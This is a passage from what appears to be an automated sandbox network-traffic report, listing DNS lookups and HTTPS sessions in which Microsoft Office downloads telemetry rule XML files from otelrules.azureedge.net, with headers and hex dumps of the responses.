                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.527692080 CET1.1.1.1192.168.2.90x981dNo error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.529623032 CET1.1.1.1192.168.2.90xcbe9No error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.254245996 CET1.1.1.1192.168.2.90x65f4No error (0)app.link99.86.4.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.254245996 CET1.1.1.1192.168.2.90x65f4No error (0)app.link99.86.4.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.254245996 CET1.1.1.1192.168.2.90x65f4No error (0)app.link99.86.4.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.254245996 CET1.1.1.1192.168.2.90x65f4No error (0)app.link99.86.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.286115885 CET1.1.1.1192.168.2.90xc74aNo error (0)support.bell.casupport.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.298772097 CET1.1.1.1192.168.2.90xc249No error (0)support.bell.casupport.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.563894987 CET1.1.1.1192.168.2.90x6dcbNo error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.563894987 CET1.1.1.1192.168.2.90x6dcbNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.564217091 CET1.1.1.1192.168.2.90x9a57No error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.564217091 CET1.1.1.1192.168.2.90x9a57No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:17.695200920 CET1.1.1.1192.168.2.90xf788No error (0)app.link99.86.4.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:17.695200920 CET1.1.1.1192.168.2.90xf788No error (0)app.link99.86.4.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:17.695200920 CET1.1.1.1192.168.2.90xf788No error (0)app.link99.86.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:17.695200920 CET1.1.1.1192.168.2.90xf788No error (0)app.link99.86.4.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      0192.168.2.94970613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:43 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:43 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                      Content-Length: 218853
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 28 Oct 2024 13:23:36 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DCF753BAA1B278"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: acfedf75-801e-002a-2768-2931dc000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131143Z-17c5cb586f67hfgj2durhqcxk800000008cg00000000f5rd
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:44 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:45 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                      Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      1192.168.2.94970713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:50 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 3788
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 041e76a7-601e-005c-45ae-26f06f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131150Z-16849878b78x6gn56mgecg60qc0000000bc000000000bt27
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      2192.168.2.94971113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:50 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131150Z-16849878b78j5kdg3dndgqw0vg0000000bcg0000000007tw
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      3192.168.2.94970913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:50 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:50 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 2980
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131150Z-16849878b78fssff8btnns3b1400000009t000000000f017
